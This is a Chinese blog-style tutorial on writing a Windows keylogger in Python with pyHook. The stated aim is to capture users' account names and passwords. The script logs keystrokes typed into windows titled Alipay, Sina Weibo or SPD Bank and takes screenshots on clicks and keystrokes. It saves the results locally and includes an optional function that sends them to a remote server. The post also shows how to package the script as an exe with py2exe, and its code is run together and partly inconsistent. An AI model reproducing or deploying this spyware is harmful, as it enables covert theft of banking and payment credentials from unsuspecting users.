本文以一段简单的监听鼠标、键盘事件的程序,实现获取用户的输入(比如登录某些网站的账号、密码)的功能。经测试,对于一台“裸奔”的电脑,完全能获取到用户输入的任何信息;但是如果安装了杀毒软件,就够呛了。具体实现方法如下:
一、代码部分:获取用户输入信息,并与截图一起保存到XX目录下
# -*- coding: utf-8 -*- # import pythoncom import pyHook import timeimport socketfrom PIL import ImageGrab##如果是远程监听某个目标电脑,可以自己架设一个服务器,然后将获取到的信息发回给服务器#def send_msg_to_server(msg): host="" port=1234 buf_size=1024 addr=(host,port) if len(msg)>0: tcp_client_sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) tcp_client_sock.connect(addr) info=time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))+' from '+socket.gethostname()+':' tcp_client_sock.sendall(info+msg) tcp_client_sock.close() ##也可以将获取到的信息保存到本地文件下#def write_msg_to_txt(msg): f=open('D:/workspace/mytest/pyhook/media/monitor.txt','a') f.write(msg+'/r/n') f.close()def onMouseEvent(event): # 监听鼠标事件 global MSG if len(MSG)!=0: #send_msg_to_server(MSG) write_msg_to_txt(MSG) MSG='' pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time())) #将用户屏幕截图,保存到本地某个目录下(也可以搞成远程发送到自己的服务器) pic = ImageGrab.grab() pic.save('D:/workspace/mytest/pyhook/media/mouse_%s.png' % pic_name) return True def onKeyboardEvent(event): #监听键盘事件 global MSG title= event.WindowName.decode('GBK') #通过网站title,判断当前网站是否是“监听目标” if title.find(u"支付宝") != -1 or title.find(u'新浪微博')!=-1 or title.find(u'浦发银行')!=-1: #Ascii: 8-Backspace , 9-Tab ,13-Enter if (127 >= event.Ascii > 31) or (event.Ascii == 8): MSG += chr(event.Ascii) if (event.Ascii == 9) or (event.Ascii == 13): #send_msg_to_remote(MSG) write_msg_to_txt(MSG) MSG = '' #屏幕抓图实现 pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time())) pic = ImageGrab.grab() #保存成为以日期命名的图片 pic.save('D:/workspace/mytest/pyhook/media/keyboard_%s.png' % pic_name) return True if __name__ == "__main__": MSG = '' #创建hook句柄 hm = pyHook.HookManager() #监控鼠标 hm.SubscribeMouseLeftDown(onMouseEvent) hm.HookMouse() #监控键盘 hm.KeyDown = onKeyboardEvent hm.HookKeyboard() #循环获取消息 pythoncom.PumpMessages()
二、用py2exe将脚本打包:
新建一个py文件setup.py,内容如下:
from distutils.core import setupimport py2exesetup(console=["monitor.py"])#setup(windows=["monitor.py"])
新闻热点
疑难解答